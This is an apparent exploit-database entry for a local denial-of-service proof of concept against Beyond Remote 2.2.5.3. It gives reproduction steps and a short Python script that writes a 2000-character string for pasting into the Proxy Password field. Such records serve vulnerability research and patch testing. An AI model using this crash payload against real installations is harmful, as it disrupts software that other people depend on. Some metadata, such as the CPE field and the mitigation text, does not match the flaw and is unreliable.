Beyond Remote 2.2.5.3 - Denial of Service (PoC)

vendor:

Beyond Remote

by:

Erenay Gencay

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Beyond Remote

Affected Version From: 2.2.5.3

Affected Version To: 2.2.5.3

Patch Exists: YES

Related CWE: N/A

CPE: 2.2.5.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP Professional sp3 (ENG)

2018

Beyond Remote 2.2.5.3 – Denial of Service (PoC)

Run the python exploit script, it will create a new file file with the name 'mre.txt'. Copy the content of the new file 'mre.txt'. Start Beyond Remote Server 2.2.5.3 and click 'Configure' than click 'Update Options' than click 'Proxy Settings' Paste the content into field 'Proxy Password' click 'OK' It will cause the DOS situation.

Mitigation:

Ensure that the application is configured to use secure authentication methods and that the application is regularly updated with the latest security patches.

Source

Exploit-DB raw data:

# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC)
# Author: Erenay Gencay
# Discovey Date: 2018-09-24
# Vendor notified : 2018-09-24
# Software Link: https://beyond-remote-client-and-server.jaleco.com/
# Tested Version: 2.2.5.3
# Tested on OS: Windows XP Professional sp3 (ENG)

# Steps to Reproduce: Run the python exploit script, it will create a new file
# file with the name "mre.txt". Copy the content of the new file "mre.txt".
# Start Beyond Remote Server 2.2.5.3 and click "Configure" than click "Update Options" than 
# click "Proxy Settings" Paste the content into field "Proxy Password" click "OK"
# It will cause the DOS situation.

bof = "A" * 2000

try:

	print("payload is loading..")
	
	dosya = open('mre.txt','w')
	dosya.write(bof)
	dosya.close()
	print(" [+] File Created")

except:
	print("Someting went wrong !")